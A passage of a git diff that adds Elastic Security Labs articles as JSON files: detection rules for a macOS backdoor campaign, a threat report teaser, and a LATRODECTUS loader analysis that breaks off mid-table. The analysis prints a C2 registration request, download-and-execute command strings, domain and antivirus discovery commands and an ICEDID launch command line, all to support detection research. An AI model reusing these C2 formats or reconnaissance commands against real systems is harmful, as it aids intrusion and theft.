placed in the temporary directory, post download (`/private/tmp/.test`), and executed with process arguments containing a path to an SSH binary. Noted by JAMF Threat Labs, this SSH binary is not in the default location of the SSH binary on macOS, which really resides at /`usr/bin/ssh`. This command line does not correlate with any intended functionality but rather an attempt to blend in.\n\nAs Patrick Wardle and JAMF stated, this binary is a macOS build of the open source, cross-platform post-exploitation agent known as [Khepri](https://github.com/geemion/Khepri) and provides full backdoor access to a target system.\n\n\n\n\nFrom a detection perspective, we could create a very specific query here that looks for hidden binaries (files prefixed with a period are hidden from the user’s view in the GUI and CLI) executing from suspicious locations that contain process arguments containing the path to the SSH binary. \n\nThe issue with creating a query like this is that, as JAMF pointed out:\n\n> one particularly interesting technique that the malware uses is replacing its command-line arguments to further blend in with the operating system.\n\nThe malware updates these process arguments between samples, so while this query might detect one of the samples, they could easily change it and bypass this detection. \n\nInstead of the process arguments, we could focus on the unsigned, hidden binary executing from a suspicious directory like `/tmp`. \n\n**Rule Name: Untrusted or Unsigned Hidden Binary Executed from Temporary Directory**\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and \nprocess.executable : (\"/private/tmp/*\", \"/tmp/*\") and \nprocess.name : \".*\" and (process.code_signature.exists == false or \nprocess.code_signature.trusted == false)\n```\n\nWith the above rule, if any hidden unsigned or untrusted binaries attempt to execute from a temporary directory, we will be alerted irrespective of whether our signature or our machine learning models detect it. \n\n\n\n\n(A note on false positives: It will happen, even though it should be extremely rare, to see hidden binaries executing from a temporary directory on macOS. There are many developers on macOS that adopt poor software development practices. False positives should be reviewed case-by-case and only excluded via the rule or Elastic exclusion list if the software is business-approved and validated.)\n\nIn addition to this rule, since the hidden payloads make outbound command and control network connections, we could also look for any outbound network connections from a hidden executable, as that is very suspicious activity on macOS and should warrant an alert at least. If you want to reduce the possibility of false positives, specify specific process executable directories like `/Users/Shared/` or `/tmp/` etc., or include process code signature data specifying unsigned or untrusted hidden executables. \n\n**Rule Name: Hidden Executable Outbound Network Connection**\n\n```\nnetwork where event.type == \"start\" and \nevent.action == “connection_attempted” and process.name : \".*\"\n```\n\nSince this is a backdoor payload that offers a variety of functionality (upload, download, etc.), it would be prudent to create additional rules that look for some of these actions from an unsigned or untrusted, hidden binary. Since we already have a rule that would detect the hidden binary's initial execution, we will move on to the next payload.\n\n### .fseventsd\n\n`.fseventsd` was the second payload dropped by the malicious dylib at (`/Users/Shared/.fseventsd`). This payload’s purpose was to provide a persistent foothold on the victim’s machine utilizing a masqueraded launch agent and to act as a downloader for another payload that has yet to be found. Still, we know from reverse engineering of `.fseventsd` is named (`.fseventsds`).\n\nWe can see via the Elastic Analyzer View the first notable event is the persistence installation of a masqueraded launch agent. \n\n\n\n\nThis activity can be tackled from two different angles. We could first detect this by looking for the masqueraded `.plist` file utilizing file events and process code signature data. In the below behavior rule, we look for files where the file name starts with `com.apple…` and the file path is a `Library/LaunchAgent` or `Library/LaunchDaemon`, and the responsible process is unsigned or untrusted. \n\n**Rule Name: Persistence via a Masqueraded Plist Filename**\n\n```\nfile where event.type != \"deletion\" and \n file.name : \"*com.apple*.plist\" and\n file.path :\n (\"/System/Library/LaunchAgents/*\", \n \"/Library/LaunchAgents/*\",\n \"/Users/*/Library/LaunchAgents/*\",\n \"/System/Library/LaunchDaemons/*\",\n \"/Library/LaunchDaemons/*\") and\n(process.code_signature.trusted == false or \nprocess.code_signature.exists == false)\n```\n\n\n\n\nThe second way we can detect this persistent install technique is to take advantage of another new data source unique to Elastic Agent, which my colleague Ricardo Ungureanu and I added to version 8.6 of Elastic Defend. We created an aptly named persistence event that monitors the launch services directories and collects the plist details, sending them back in a structured event that can be used to create rules around suspicious or malicious Launch Agents or Daemons. \n\nIn the following rule, we look for launch events where the `runatload` value is set to `true` or the `keepalive` value is set to `true`. The plist arguments contain the path to a hidden executable in the `/Users/Shared` directory. This rule could be expanded to include additional suspicious or malicious arguments that would alert you to the installation of persistence by a malicious or suspicious binary. \n\n**Rule Name: Persistence via Suspicious Launch Agent or Launch Daemon**\n\n```\nfile where event.action == \"launch_daemon\" and \n(Persistence.runatload == true or Persistence.keepalive == true) and \n Persistence.args : \"/Users/Shared/.*\"\n```\n\n\n\n\nThe masqueraded plist could also be detected using this persistence event using the below query.\n\n```\nfile where event.action == \"launch_daemon\" and \nPersistence.name : \"com.apple.*\" and \n(process.code_signature.exists == false or \nprocess.code_signature.trusted == false)\n```\n\nThe final piece here is the downloading of the missing 3rd stage payload. The hidden `.fseventsd` located in the `/Users/Shared` folder reaches out to download this new hidden payload to the `/tmp/` directory. You might remember we already created two rules (“Hidden Binary Executed from Temporary Directory” and “Hidden Executable Outbound Network Connection”) that would detect this activity. \n\nWe could add another rule to catch when a hidden executable is created in a suspicious directory. We can look for any file event where the event action is not the deletion of the file, the file name denotes a hidden file, the file contains Mach-O header bytes, and the file path is a path where the execution of a hidden file is not common. We collect file header bytes if the file is an executable, allowing us to denote executable files from other types of files not based solely on the file extension.\n\n**Rule Name: Hidden Executable Created in Unusual Directory**\n\n```\nfile where event.action != \"deletion\" and file.name : \".*\" and \nfile.Ext.header_bytes : (\"cffaedfe*\", \"cafebabe*\") and \nfile.path : (\"/Users/Shared/*\", \"/private/tmp/*\", \"/tmp/*\")\n```\n\n\n\n\n## Summary\n\nThis malware is representative of many campaigns targeting macOS today. Our report on the DPRK malware KANDYKORN shows that these campaigns are modular, encompassing multiple stages of payloads with capabilities and functionality distributed between these payloads to avoid detection. You can see that with UltraEdit, one payload serves as the interactive backdoor and the other as the persistence mechanism. Malware like this can often easily update to avoid signatures. Still, as we have shown, behavior rules are unavoidable and allow us to bridge the gap between static signatures and machine learning models. \n\nBehavior-based rules are very powerful if you have the right data and the ability to correlate that data. Our endpoint behavior rules can detect and prevent malware regardless of whether it updates or not. We have over 200+ endpoint behavior rules on macOS alone, including versions of those shown in this publication, that allow us to detect and prevent previously “undetected” malware by observing its actions in real time. If you want to check out our production endpoint behavior rules, they can be found [here](https://github.com/elastic/protections-artifacts). To learn more about our query languages, you can look here ([EQL](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) and [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-getting-started.html)). We are proud to be an open source company and want to let our software and features speak for themselves. If you want to test and explore these features for yourself, you can easily create an [Elastic Cloud](https://www.elastic.co/cloud) Account with a 30-day trial license, or for local testing, you can download “[The Elastic Container Project](https://github.com/peasead/elastic-container)” and set the license value to trial in the `.env` file. \n\n## References\n\n* [https://twitter.com/malwrhunterteam/status/1745959438140297697](https://twitter.com/malwrhunterteam/status/1745959438140297697)\n* [https://objective-see.org/blog/blog_0x79.html](https://objective-see.org/blog/blog_0x79.html)\n* [https://jamf.com/blog/jtl-malware-pirated-applications](https://jamf.com/blog/jtl-malware-pirated-applications/)\n* [https://developer.apple.com/documentation/endpointsecurity](https://developer.apple.com/documentation/endpointsecurity) "
+ },
+ "title": "Sinking macOS Pirate Ships with Elastic Behavior Detections",
+ "slug": "sinking-macos-pirate-ships",
+ "date": "2024-03-15",
+ "description": "This research looks at a recently found macOS malware campaign using the macOS Endpoint Security Framework paired with the Elastic Agent to hunt and detect the behaviors this malware exhibits.",
+ "author": [
+ {
+ "slug": "colson-wilhoit"
+ }
+ ],
+ "image": "photo-edited-01@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "macOS"
+ ]
+ },
+ "id": "security_labs_content-sinking_macos_pirate_ships-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sneak_peek_elastic_2022_global_threat_report-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sneak_peek_elastic_2022_global_threat_report-md.json
new file mode 100644
index 00000000000..c36e66a06d0
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sneak_peek_elastic_2022_global_threat_report-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Sneak Peek: Elastic’s 2022 Global Threat Report\"\nslug: \"sneak-peek-elastic-2022-global-threat-report\"\ndate: \"2022-11-30\"\ndescription: \"Elastic Security Labs has compiled the 2022 Global Threat Report to share trends and tactics adversaries and attack groups use, as observed by our threat research team and broader user community over the past year.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"blog-open-security-720x420-B.jpg\"\ncategory:\n - slug: reports\n---\n\nThe [Elastic Security Labs](http://www.elastic.co/security-labs) team is passionate about securing the world’s data from attack, and strives to raise the bar within the security industry. To this end, Elastic Security Labs has compiled the [2022 Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) to share trends and tactics adversaries and attack groups use, as observed by our threat research team and broader user community over the past year.\n\nLet’s dig into a few of the endpoint related findings:\n\n1. 72% of all defense evasion techniques consisted of masquerading and system binary proxy execution\n\n2. ~77% of all credential access techniques are attributed to OS credential dumping with commonly known utilities\n\nHere’s a chart on how the endpoint techniques breakdown across our data set.\n\n\n\nThis was just a preview of the research coming your way. We have lots of findings and recommendations coming your way soon. Stay tuned to [Elastic Security Labs](http://www.elastic.co/security-labs) for the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report).\n"
+ },
+ "title": "Sneak Peek: Elastic’s 2022 Global Threat Report",
+ "slug": "sneak-peek-elastic-2022-global-threat-report",
+ "date": "2022-11-30",
+ "description": "Elastic Security Labs has compiled the 2022 Global Threat Report to share trends and tactics adversaries and attack groups use, as observed by our threat research team and broader user community over the past year.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "blog-open-security-720x420-B.jpg",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-sneak_peek_elastic_2022_global_threat_report-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-spring_cleaning_with_latrodectus-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-spring_cleaning_with_latrodectus-md.json
new file mode 100644
index 00000000000..ad397fb6cc3
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-spring_cleaning_with_latrodectus-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID\"\nslug: \"spring-cleaning-with-latrodectus\"\ndate: \"2024-05-16\"\nsubtitle: \"The LATRODECTUS loader evolves to deliver ICEDID and other malware\"\ndescription: \"Elastic Security Labs has observed an uptick in a recent emerging loader known as LATRODECTUS. This lightweight loader packs a big punch with ties to ICEDID and may turn into a possible replacement to fill the gap in the loader market.\"\nauthor:\n - slug: daniel-stepanic\n - slug: samir-bousseaden\nimage: \"Security Labs Images 16.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - icedid\n - latrodectus\n - loader\n---\n\n## LATRODECTUS at a glance\n\nFirst [discovered](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39) by Walmart researchers in October of 2023, [LATRODECTUS](https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111) is a malware loader gaining popularity among cybercriminals. While this is considered a new family, there is a strong link between LATRODECTUS and [ICEDID](https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary) due to behavioral and developmental similarities, including a command handler that downloads and executes encrypted payloads like ICEDID. Proofpoint and Team Cymru built upon this connection to discover a [strong link](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice) between the network infrastructure used by both the operators of ICEDID and LATRODECTUS.\n\nLATRODECTUS offers a comprehensive range of standard capabilities that threat actors can utilize to deploy further payloads, conducting various activities after initial compromise. The code base isn’t obfuscated and contains only 11 command handlers focused on enumeration and execution. This type of loader represents a recent wave observed by our team such as [PIKABOT](https://www.elastic.co/security-labs/pikabot-i-choose-you), where the code is more lightweight and direct with a limited number of handlers. \n\nThis article will focus on LATRODECTUS itself, analyzing its most significant features and sharing resources for addressing this financially impactful threat.\n\n### Key takeaways\n\n - Initially discovered by Walmart researchers last year, LATRODECTUS continues to gain adoption among recent financially-motivated campaigns\n - LATRODECTUS, a possible replacement for ICEDID shares similarity to ICEDID including a command handler to execute ICEDID payloads\n - We observed new event handlers (process discovery, desktop file listing) since its inception and integration of a self-delete technique to delete running files\n - Elastic Security provides a high degree of capability through memory signatures, behavioral rules, and hunting opportunities to respond to threats like LATRODECTUS\n\n### LATRODECTUS campaign overview\n\nBeginning early March of 2024, Elastic Security Labs observed an increase in email campaigns delivering LATRODECTUS. These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file, remotely hosted on a WEBDAV share.\n\n\n\nWith major changes in the loader space during the past year, such as the [QBOT](https://www.elastic.co/security-labs/qbot-malware-analysis) takedown and [ICEDID](https://www.elastic.co/security-labs/unpacking-icedid) dropping off, we are seeing new loaders such as [PIKABOT](https://www.elastic.co/security-labs/pikabot-i-choose-you) and [LATRODECTUS](https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111) have emerged as possible replacements.\n\n## LATRODECTUS analysis\n\nOur LATRODECTUS [sample](https://www.virustotal.com/gui/file/aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c/details) comes initially packed with file information [masquerading](https://attack.mitre.org/techniques/T1036/) as a component to Bitdefender’s kernel-mode driver (TRUFOS.SYS), shown in the following image.\n\n\n\n\nIn order to move forward with malware analysis, the sample must be unpacked manually or via an automatic unpacking service such as [UnpacMe](http://Unpac.Me).\n\n\n\n\nLATRODECTUS is a DLL with 4 different exports, and each export is assigned the same export address.\n\n\n\n\n### String obfuscation \n\nAll of the strings within LATRODECTUS are protected using a straightforward algorithm on the encrypted bytes and applying a transformation by performing arithmetic and bitwise operations. The initial [report](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39) published in 2023 detailed a PRNG algorithm that was not observed in our sample, suggesting continuous development of this loader. Below is the algorithm implemented in Python using our [nightMARE framework](https://github.com/elastic/labs-releases/tree/main/nightMARE):\n\n``` python\ndef decrypt_string(encrypted_bytes: bytes) -> bytes:\n x = cast.u32(encrypted_bytes[:4])\n y = cast.u16(encrypted_bytes[4:6])\n byte_size = cast.u16(cast.p32(x ^ y)[:2])\n decoded_bytes = bytearray(byte_size)\n\n for i, b in enumerate(encrypted_bytes[6 : 6 + byte_size]):\n decoded_bytes[i] = ((x + i + 1) ^ b) % 256\n\n return bytes(decoded_bytes)\n```\n\n### Runtime API\n\nLATRODECTUS obfuscates the majority of its imports until runtime. At the start of the program, it queries the PEB in combination with using a CRC32 checksum to resolve ```kernel32.dll``` and ```ntdll.dll``` modules and their functions. In order to resolve additional libraries such as ```user32.dll``` or ```wininet.dll```, the malware takes a different approach performing a wildcard search (```*.dll```) in the Windows system directory. It retrieves each DLL filename and passes them directly to a CRC32 checksum function. \n\n\n\n\n### Anti-analysis\nWhen all the imports are resolved, LATRODECTUS performs several serial anti-analysis checks. The first monitors for a debugger by looking for the BeingDebugged flag inside the Process Environment Block (PEB). If a debugger is identified, the program terminates.\n\n\n\n\nIn order to avoid sandboxes or virtual machines that may have a low number of active processes, two validation checks are used to combine the number of running processes with the OS product version. \n\n\n\n\nIn order to account for the major differences between Windows OS versions, the developer uses a custom enum based on the major/minor version, and build numbers within Windows.\n\n\n\n\nThe two previous conditions translate to:\n\n - LATRODECTUS will exit if the number of processes is less than 75 and the OS version is a recent build such as Windows 10, Windows Server 2016, or Windows 11\n - LATRODECTUS will exit if the number of processes is less than 50 and the OS version is an older build such as Windows Server 2003 R2, Windows XP, Windows 2000, Windows 7, Windows 8, or Windows Server 2012/R2\n\nAfter the sandbox check, LATRODECTUS verifies if the current process is running under WOW64, a subsystem of Windows operating systems that allows for 32-bit applications to run on 64-bit systems. If true (running as a 32-bit application on a 64-bit OS), the malware will exit.\n\n\n\n\nThe last check is based on verifying the MAC address via the ```GetAdaptersInfo()``` call from ```iphlpapi.dll```. If there is no valid MAC Address, the malware will also terminate.\n\n\n\n\n### Mutex\n\nThis malware uses the string ```runnung``` as the mutex to prevent re-infection on the host, which may be an accidental typo on the part of developers.\n\n\n\n\n### Hardware ID\n\nAfter the mutex creation, LATRODECTUS will generate a hardware ID that is seeded from the volume serial number of the machine in combination with multiplying a hard-coded constant (```0x19660D```).\n\n\n\n\n### Campaign ID\n\nAt this stage, the decrypted campaign name (```Littlehw```) from our sample is used as a seed passed into a Fowler–Noll–Vo hashing [function](https://en.wikipedia.org/wiki/Fowler%E2%80%93Noll%E2%80%93Vo_hash_function). This will produce a hash that is used by the actor to track different campaigns and associated victim machines.\n\n\n\n\n### Setup / persistence\n\nThe malware will generate a folder path using a configuration parameter, these determine the location where LATRODECTUS will be dropped on disk, such as the following directories:\n - ```AppData```\n - ```Desktop```\n - ```Startup```\n - ```Personal```\n - ```Local\\AppData```\n\nOur sample was configured with the ```AppData``` location using a hard-coded directory string ```Custom_update``` along with a hardcoded filename ```Update_``` concatenated with digits seeded from the volume serial number. Below is the full file path inside our VM:\n\n```\nC:\\Users\\REM\\AppData\\Roaming\\Custom_update\\Update_88d58563.dll\n```\n\nThe malware will check for an existing file ```AppData\\Roaming\\Custom_update\\update_data.dat``` to read from, and if the file does not exist it will create the directory before writing a copy of itself in the directory.\n\n\n\n\nAfter the file is copied, LATRODECTUS retrieves two C2 domains from the global configuration, using the previously-described string decryption function.\n\n\n\n\nBefore the main thread is executed for command dispatching, LATRODECTUS sets up a scheduled task for persistence using the Windows Component Object Model (COM). \n\n\n\n\nIn our sample, the task name is hardcoded as ```Updater``` and scheduled to execute upon successful logon.\n\n\n\n\n### Self-deletion\n\nSelf-deletion is one noteworthy technique incorporated by LATRODECTUS. It was [discovered](https://x.com/jonasLyk/status/1350401461985955840) by Jonas Lykkegaard and implemented by Lloyd Davies in the delete-self-poc [repo](https://github.com/LloydLabs/delete-self-poc). The technique allows LATRODECTUS to delete itself while the process is still running using an alternate data stream. \n\nElastic Security Labs has seen this technique adopted in malware such as the [ROOK](https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/#anti-detection-alternate-data-streams) ransomware family. The likely objective is to hinder incident response processes by interfering with collection and analysis. The compiled malware contains a [string](https://github.com/LloydLabs/delete-self-poc/blob/49fe92218fdcfe8e173aa60a9eb307bae07cb027/main.h#L10) (```:wtfbbq```) present in the repository.\n\n\n\n\nThis technique is observed at the start of the infection as well as when the malware performs an update using event handler #15. Elastic Security Labs has created a [CAPA rule](https://github.com/mandiant/capa-rules/blob/master/anti-analysis/anti-forensic/self-deletion/self-delete-using-alternate-data-streams.yml) to help other organizations identify this behavior generically when analyzing various malware.\n\n### Communication\n\nLATRODECTUS encrypts its requests using base64 and RC4 with a hardcoded password of ```12345```. The first POST request over HTTPS that includes victim information along with configuration details, registering the infected system.\n\n```\nPOST https://aytobusesre.com/live/ HTTP/1.1\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\nHost: aytobusesre.com\nContent-Length: 256\nCache-Control: no-cache\n\nM1pNDFh7flKrBaDJqAPvJ98BTFDZdSDWDD8o3bMJbpmu0qdYv0FCZ0u6GtKSN0g//WHAS2npR/HDoLtIKBgkLwyrIh/3EJ+UR/0EKhYUzgm9K4DotfExUiX9FBy/HeV7C4PgPDigm55zCU7O9kSADMtviAodjuRBVW3DJ2Pf5+pGH9SG1VI8bdmZg+6GQFpcFTGjdWVcrORkxBjCGq3Eiv2svt3+ZFIN126PcvN95YJ0ie1Puljfs3wqsW455V7O\n```\n\n\n\nBelow is an example of the decrypted contents sent in the first request:\n\n```\ncounter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&mac=00:0c:24:0e:29:85;&computername=DESKTOP-3C4ILHO&domain=-\n```\n\n| Name | Description |\n| ---- | ----------- |\n| counter | Number of C2 requests increments by one for each callback |\n| type | Type of request (registration, etc) |\n| guid | Generated hardware ID seeded by volume serial number |\n| os | Windows OS product version |\n| arch | Windows architecture version |\n| username | Username of infected machine |\n| group | Campaign identifier seeded by unique string in binary with FNV |\n| version | LATRODECTUS version |\n| up | Unknown |\n| direction | C2 domain\n| mac | MAC Address |\n| computername | Hostname of infected machine |\n| domain | Domain belonging to infected machine |\n\nEach request is pipe-delimited by an object type, integer value, and corresponding argument. There are 4 object types which route the attacker controlled commands (**CLEARURL**, **URLS**, **COMMAND**, **ERROR**). \n\n\n\n\nThe main event handlers are passed through the **COMMAND** object type with the handler ID and their respective argument.\n\n```\nCOMMAND|12|http://www.meow123.com/test \n```\n\nThe **CLEARURL** object type is used to delete any configured domains. The **URLS** object type allows the attacker to swap to a new C2 URL. The last object type, **ERROR**, is not currently configured.\n\n\n\n\n### Bot Functionality\n\nLATRODECTUS’s core functionality is driven through its command handlers. These handlers are used to collect information from the victim machine, provide execution capabilities as well as configure the implant. We have seen two additional handlers (retrieve processes, desktop listing) added since the initial [publication](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39) which may be a sign that the codebase is still active and changing. \n\n\n| Command ID | Description |\n| ---------- | ----------- |\n| 2 | Retrieve file listing from desktop directory |\n| 3 | Retrieve process ancestry |\n| 4 | Collect system information |\n| 12 | Download and execute PE |\n| 13 | Download and execute DLL |\n| 14 | Download and execute shellcode |\n| 15 | Perform update, restart |\n| 17 | Terminate own process and threads |\n| 18 | Download and execute ICEDID payload |\n| 19 | Increase Beacon Timeout |\n| 20 | Resets request counter |\n\n#### Desktop listing - command ID (2)\n\nThis command handler will retrieve a list of the contents of the user’s desktop, which the developer refers to as ```desklinks```. This data will be encrypted and appended to the outbound beacon request. This is used for enumerating and validating victim environments quickly.\n\n\n\n\n**Example request**:\n\n```\ncounter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&desklinks=[\"OneDrive.lnk\",\"OneNote.lnk\",\"PowerPoint.lnk\",\"Notepad++.lnk\",\"Excel.lnk\",\"Google Chrome.lnk\",\"Snipping Tool.lnk\",\"Notepad.lnk\",\"Paint.lnk\"]\n```\n\n#### Process ancestry - command ID (3)\n\nThis event handler is referenced as **proclist** by the developer where it collects the entire running process ancestry from the infected machine via the **CreateToolhelp32Snapshot** API. \n\n\n\n\nLike security researchers, malware authors are interested in process parent/child relationships for decision-making. The authors of LATRODECTUS even collect information about process grandchildren, likely to validate different compromised environments.\n\n\n\n\n#### Collect system information - command ID (4)\n\nThis command handler creates a new thread that runs the following system discovery/enumeration commands, each of which is a potential detection opportunity:\n\n``` bash\nC:\\Windows\\System32\\cmd.exe /c ipconfig /all\nC:\\Windows\\System32\\cmd.exe /c systeminfo\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts /all_trusts\nC:\\Windows\\System32\\cmd.exe /c net view /all /domain\nC:\\Windows\\System32\\cmd.exe /c net view /all\nC:\\Windows\\System32\\cmd.exe /c net group \"Domain Admins\" /domain\nC:\\Windows\\System32\\wbem\\wmic.exe /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\nC:\\Windows\\System32\\cmd.exe /c net config workstation\nC:\\Windows\\System32\\cmd.exe /c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed\nC:\\Windows\\System32\\cmd.exe /c whoami /groups\n```\n\nEach output is placed into URI with corresponding collected data:\n\n```\n&ipconfig=\n&systeminfo=\n&domain_trusts=\n&domain_trusts_all=\n&net_view_all_domain=\n&net_view_all=\n&net_group=\n&wmic=\n&net_config_ws=\n&net_wmic_av=\n&whoami_group=\n```\n\n#### Download and execute PE - command ID (12)\n\nThis handler downloads a PE file from the C2 server then writes the content to disk with a randomly generated file name, then executes the file.\n\n\n\n\nBelow is an example in our environment using this handler:\n\n\n\n\n#### Download and execute DLL - command ID (13)\n\nThis command handler downloads a DLL from C2 server, writes it to disk with a randomly generated file name, and executes the DLL using rundll32.exe.\n\n\n\n\n#### Download and execute shellcode - command (14)\n\nThis command handler downloads shellcode from the C2 server via ```InternetReadFile```, allocates and copies the shellcode into memory then directly calls it with a new thread pointing at the shellcode.\n\n\n\n\n#### Update / restart - command ID (15)\n\nThis handler appears to perform a binary update to the malware where it’s downloaded, the existing thread/mutex is notified, and then released. The file is subsequently deleted and a new binary is downloaded/executed before terminating the existing process.\n\n\n\n\n#### Terminate - command ID (17)\nThis handler will terminate the existing LATRODECTUS process.\n\n\n\n\n#### Download and execute hosted ICEID payload - command ID (18)\n\nThis command handler downloads two ICEDID components from a LATRODECTUS server and executes them using a spawned ```rundll32.exe``` process. We haven’t personally observed this being used in-the-wild, however.\n\nThe handler creates a folder containing two files to the ```AppData\\Roaming\\``` directory. These file paths and filenames are seeded by a custom random number generator which we will review in the next section. In our case, this new folder location is: \n\n```\nC:\\Users\\REM\\AppData\\Roaming\\-632116337\n```\n\nIt retrieves a file (```test.dll```) from the C2 server, the standard ICEDID loader, which is written to disk with a randomly -generated file name (```-456638727.dll```).\n\n\n\n\nLATRODECTUS will then perform similar steps by generating a random filename for the ICEDID payload (```1431684209.dat```). Before performing the download, it will set-up the arguments to properly load ICEDID. If you have run into ICEDID in the past, this part of the command-line should look familiar: it’s used to call the ICEDID export of the loader, while passing the relative path to the encrypted ICEDID payload file.\n\n```\ninit -zzzz=\"-632116337\\1431684209.dat\"\n```\n\n\n\n\nLATRODECUS initiates a second download request using a hard-coded URI (```/files/bp.dat```) from the configured C2 server, which is written to a file (```1431684209.dat```). Analyzing the ```bp.dat``` file, researchers identified it as a conventional encrypted ICEDID payload, commonly referenced as ```license.dat```.\n\n\n\n\nAfter decrypting the file, malware researchers noted a familiar 129 byte sequence of junk bytes prepended to the file followed by the custom section headers. \n\n\n\n\nOur team was able to revisit [prior tooling](https://www.elastic.co/security-labs/unpacking-icedid) and successfully decrypt this file, enabling us to rebuild the PE (ICEDID).\n\n\n\n\nAt this point, the ICEDID loader and encrypted payload have been downloaded to the same folder.\n\n\n\nThese files are then executed together using ```rundll32.exe``` via **CreateProcessW** with their respective arguments. Below is the observed command-line:\n\n```\nrundll32.exe C:\\Users\\REM\\AppData\\Roaming\\-632116337\\-456638727.dll,init -zzzz=\"-632116337\\1431684209.dat\"\n```\n\n\n\n\nScanning the ```rundll32.exe``` child process spawned by LATRODECTUS with our ICEDID YARA rule also indicates the presence of the ICEDID. \n\n\n\n\n#### Beacon timeout - command ID (19)\n\nLATRODECTUS supports jitter for beaconing to C2. This can make it harder for defenders to detect via network sources due to randomness this introduces to beaconing intervals.\n\n\n\n\nIn order to calculate the timeout, it generates a random number by seeding a combination of the user’s cursor position on the screen multiplied by the system’s uptime (```GetTickCount```). This result is passed as a parameter to **RtlRandomEx**. \n\n\n\n\n#### Reset counter - command ID (20)\n\nThis command handler will reset the request counter that is passed on each communication request. For example, on the third callback it is filled with 3 here. With this function, the developer can reset the count starting from 0.\n\n```\ncounter=3&type=4&guid=638507385\n```\n\n### LATRODECTUS / ICEDID connection\n\nThere definitely is some kind of development connection or working arrangement between ICEDID and LATRODECTUS. Below are some of the similarities observed:\n - Same enumeration commands in the system discovery handler\n - The DLL exports all point to same export function address, this was a common observation with ICEDID payloads\n - C2 data is concatenated together as variables in the C2 traffic requests\n - The ```bp.dat``` file downloaded from handler (#18) is used to execute the ICEDID payload via ```rundll32.exe``` \n - The functions appear to be similarly coded\n\n\n\n\nResearchers didn’t conclude that there was a clear relationship between the ICEDID and LATRODECTUS families, though they appear at least superficially affiliated. ICEDID possesses more mature capabilities, like those used for data theft or the [BackConnect](https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol) module, and has been richly documented over a period of several years. One hypothesis being considered is that LATRODECTUS is being actively developed as a replacement for ICEDID, and the handler (#18) was included until malware authors were satisfied with LATRODECTUS’ capabilities.\n\n### Sandboxing LATRODECTUS\n\nTo evaluate LATRODECTUS detections, we set up a Flask server configured with the different handlers to instruct an infected machine to perform various actions in a sandbox environment. This method provides defenders with a great opportunity to assess the effectiveness of their detection and logging tools against every capability. Different payloads like shellcode/binaries can be exchanged as needed.\n\n\n\n\nAs an example, for the download and execution of a DLL (handler #13), we can provide the following request structure (object type, handler, arguments for handler) to the command dispatcher:\n\n```\nCOMMAND|13|http://www.meow123.com/dll, ShowMessage\n```\n\nThe following example depicts the RC4-encrypted string described earlier, which has been base64-encoded.\n\n```\nE3p1L21QSBOqEKjYrBKiLNZJTk7KZn+HWn0p2LQfOLWCz/py4VkkAxSXXdnDd39p2EU=\n```\n\nUsing the following CyberChef recipe, analysts can generate encrypted command requests:\n\n\n\n\nUsing the actual malware codebase and executing these different handlers using a low-risk framework, defenders can get a glimpse into the events, alerts, and logs recorded by their security instrumentation. \n\n## Detecting LATRODECTUS\n\nThe following Elastic Defend protection features trigger during the LATRODECTUS malware infection process: \n\n\n\n\nBelow are the prebuilt MITRE ATT&CK-aligned rules with descriptions:\n\n| ATT&CK technique | Elastic Rule | Description |\n| ----- | ----- | ----- |\n| [T1059.007 - Javascript](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_oversized_windows_script_execution.toml) [T1027 - Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/) | [Suspicious Oversized Script Execution](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/execution_oversized_windows_script_execution.toml) | LATRODECTUS is delivered via oversized Javascript files, on average more than 800KB filled with random text. 